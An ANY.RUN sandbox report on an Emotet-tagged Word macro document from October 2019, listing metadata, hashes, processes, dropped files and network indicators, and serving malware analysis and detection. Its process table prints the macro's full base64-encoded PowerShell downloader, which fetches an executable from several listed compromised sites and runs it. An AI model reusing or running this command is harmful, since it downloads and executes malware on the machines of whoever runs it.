analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

p1.doc

Full analysis: https://app.any.run/tasks/0f4d96c4-1cb4-4ac0-a1f8-bd8e38894621
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: October 14, 2019, 17:36:54
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet-doc
emotet
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: magnetic, Subject: alarm, Author: Boyd Cruickshank, Keywords: backing up, Comments: bypass, Template: Normal.dotm, Last Saved By: Leo Treutel, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Oct 14 15:06:00 2019, Last Saved Time/Date: Mon Oct 14 15:06:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 174, Security: 0
MD5:

09BE00087F6E9169610322AD811794DF

SHA1:

3950344764AADBB325B57069D2240F4E891FB026

SHA256:

63E1801EE2C4B9FD49980188F100D78EFB85C360A5772A4EEAFCE7EEE56C3D9C

SSDEEP:

3072:qqfzpFaKgdzSrGpKyIwLx3jV3ggo7V1FjDQJ1dLHHRBgD:qqfzpFaKUzSGnLx3jgjirnvg

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • PowerShell script executed

      • powershell.exe (PID: 3824)
    • Executed via WMI

      • powershell.exe (PID: 3824)
    • Creates files in the user directory

      • powershell.exe (PID: 3824)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2532)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2532)
    • Reads settings of System Certificates

      • powershell.exe (PID: 3824)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
Manager: Parker
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 203
Paragraphs: 1
Lines: 1
Company: Rau - Zulauf
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 174
Words: 30
Pages: 1
ModifyDate: 2019:10:14 14:06:00
CreateDate: 2019:10:14 14:06:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: Leo Treutel
Template: Normal.dotm
Comments: bypass
Keywords: backing up
Author: Boyd Cruickshank
Subject: alarm
Title: magnetic
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
39
Monitored processes
2
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2532"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\p1.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3824powershell -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABhADAAeABmADAANQA1ADAAZgAyAGUANQA2AGQAZABjAD0AJwBhADAAeAAxAGUANwA3AGIAOAA1ADEAZAA0ACcAOwAkAGEAMAB4AGIAMgBjAGMANwBkADAAMgAzADkAIAA9ACAAJwAzADEANwAnADsAJABhADAAeAA5ADkAOABmADEAOAA0ADIAMgBlADMAZgA9ACcAYQAwAHgAYgBhADUANQBmADAAMwBiAGUAMwBiADIAMQBkAGEAJwA7ACQAYQAwAHgAOQBhADIAYgA1AGEAMQAzADMAOABmADUAMAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAYQAwAHgAYgAyAGMAYwA3AGQAMAAyADMAOQArACcALgBlAHgAZQAnADsAJABhADAAeAAwADQAOQA4ADUAZAA3AGIANQA3AD0AJwBhADAAeAAyAGEAOAAxAGQAZABhAGMANwA1AGIAMgBlACcAOwAkAGEAMAB4ADIAZQAyADUAOQBhADcAOAA4ADQAPQAmACgAJwBuAGUAdwAtAG8AJwArACcAYgBqAGUAJwArACcAYwAnACsAJwB0ACcAKQAgAG4ARQBUAC4AVwBlAEIAQwBMAEkARQBOAHQAOwAkAGEAMAB4ADYANwBkAGEANwBmADkAOAAyADYANgA9ACcAaAB0AHQAcABzADoALwAvAGYAaQBsAGUAZwBzAHQALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAEsAbAAvACoAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBlAHIAYwBlAGsAbwAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvADEAZQBrADcALwAqAGgAdAB0AHAAcwA6AC8ALwBrAGEAbQBwAHUAcwBtAGEAbgBpAGEALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwA0AGYAMgBjADgALwAqAGgAdAB0AHAAcwA6AC8ALwB2AHAAcwAzADMAMwAuAGMAbwBtAC8AMAA3AGgAMwAxAC8AMQBnAGoAeQA5AC8AKgBoAHQAdABwADoALwAvAG4AdQB0AHQAbABlAGYAaQBiAGUAcgBhAHIAdAAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AZQBJAEQAQwBhAE8ALwAnAC4AIgBzAFAAYABMAGkAdAAiACgAJwAqACcAKQA7ACQAYQAwAHgAMwBmADcANwA4ADIANwAzAGEAYwA0ADUAZAA9ACcAYQAwAHgAOQA4ADAAYgBjADgAMwAxADMAZgBmACcAOwBmAG8AcgBlAGEAYwBoACgAJABhADAAeAA3ADYAZABiADIANABkADAAMQA3ACAAaQBuACAAJABhADAAeAA2ADcAZABhADcAZgA5ADgAMgA2ADYAKQB7AHQAcgB5AHsAJABhADAAeAAyAGUAMgA1ADkAYQA3ADgAOAA0AC4AIgBEAE8AYABXAGAATgBMAE8AQQBgAGQARgBpAGwAZQAiACgAJABhADAAeAA3ADYAZABiADIANABkADAAMQA3ACwAIAAkAGEAMAB4ADkAYQAyAGIANQBhADEAMwAzADgAZgA1ADAAKQA7ACQAYQAwAHgAYQA4ADcAYQBhADgANABjAGUAMAA5AGMAPQAnAGEAMAB4AGQANAA4ADcAZABlAGQAYgAzADEAMgBlACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQBJACcAKwAnAHQAJwArACcAZQBtACcAKQAgACQAYQAwAHgAOQBhADIAYgA1AGEAMQAzADMAOABmADUAMAApAC4AIgBMAGUAYABOAGcAdABIACIAIAAtAGcAZQAgADMAMAAzADIAMwApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAFQAYABBAFIAVAAiACgAJABhADAAeAA5AGEAMgBiADUAYQAxADMAMwA4AGYANQAwACkAOwAkAGEAMAB4AGUAMwA3ADgAMAA3ADgAMgA1AGEAYgA0ADkAZQBiAD0AJwBhADAAeABmADAAMAA2AGMAYgA4ADIANAAyAGYANQA1ADgAYwAnADsAYgByAGUAYQBrADsAJABhADAAeABkAGEAOQAwAGMANABmAGEAZgBlAGMAPQAnAGEAMAB4AGUAZgBjAGEAMwBkAGEAOQAxADgAZgA2AGIANAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABhADAAeAAwADIAZQA4ADUAMAAxAGUANgAyAGIAMQBiAGQAYwA9ACcAYQAwAHgAZQA0AGYAOQBhADQAZQAxAGEAYwAyACcAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
2 147
Read events
1 321
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
2
Unknown types
17

Dropped files

PID
Process
Filename
Type
2532WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA7E3.tmp.cvr
MD5:
SHA256:
3824powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JYZEGHBS0QJ3QUP32V5U.temp
MD5:
SHA256:
2532WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\p1.doc.LNKlnk
MD5:41E22CDFBDBA119F048FC48D51BD0472
SHA256:81C3E0701C971A2CDFE6D85A9F0A549C04996FC395BD2016A74433DBA65451E0
2532WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:E1E755A4091E2D3D0C180A378BC8E635
SHA256:E3A72D8AAF79D861232A9FB7708289C906B122349E35734C248A8582B5494758
2532WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DA828CD8.wmfwmf
MD5:3257DF167AAD273710F2C2E3649686CE
SHA256:2E5D20BA8BC5CD545D7B69E8D912C75C7F3CF5CD2D15C7E726C0E9FAE9D7FCDA
2532WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4A09212B.wmfwmf
MD5:56E9DF0BBE71C402803974B17A34A7DC
SHA256:20B5E9040ACEF49D79339BED1CA56A99692CA3B45FFF5626F33E1FBFB10190AD
2532WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2ADDAA5D.wmfwmf
MD5:89BB5DDF8C080E8A15C1B9210252966A
SHA256:8EBC66B5E5447522479155BD3E605D56358F04693CD18FA487A0CD7C39DE4B15
2532WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2237B4BA.wmfwmf
MD5:ABA31C7763C24E3088F8A259C8EDFE8C
SHA256:6AE07F9ADF081CE1CC2EBCF4A80765C4143851CF2A0DDFC81E65D490E7FB42BC
2532WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A2E0D130.wmfwmf
MD5:1C4B9F8DF8192EDB4DCB3F1EE95232CF
SHA256:91C1F7194719EC472D0B1298089D439715960259E9EB7FA8C81155B5AEF24CA8
2532WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\30662C6F.wmfwmf
MD5:FF5FFE871362F22D327B4FC1E7853322
SHA256:0848AD34C05306D1B73E12E8B4ECEF6E348C268ABE2309FE596B9F56C4EED329
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
5
DNS requests
6
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3824
powershell.exe
GET
404
35.196.42.152:80
http://nuttlefiberart.com/wp-admin/eIDCaO/
US
xml
345 b
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3824
powershell.exe
104.31.95.133:443
filegst.com
Cloudflare Inc
US
shared
3824
powershell.exe
35.196.42.152:80
nuttlefiberart.com
Google Inc.
US
unknown
3824
powershell.exe
78.142.210.165:443
kampusmania.com
JSC Mediasoft ekspert
RU
unknown
3824
powershell.exe
161.117.183.16:443
vps333.com
SG
unknown
3824
powershell.exe
104.27.142.41:443
www.merceko.com
Cloudflare Inc
US
unknown

DNS requests

Domain
IP
Reputation
filegst.com
  • 104.31.95.133
  • 104.31.94.133
unknown
www.merceko.com
  • 104.27.142.41
  • 104.27.143.41
unknown
kampusmania.com
  • 78.142.210.165
unknown
vps333.com
  • 161.117.183.16
unknown
nuttlefiberart.com
  • 35.196.42.152
unknown

Threats

No threats detected
No debug info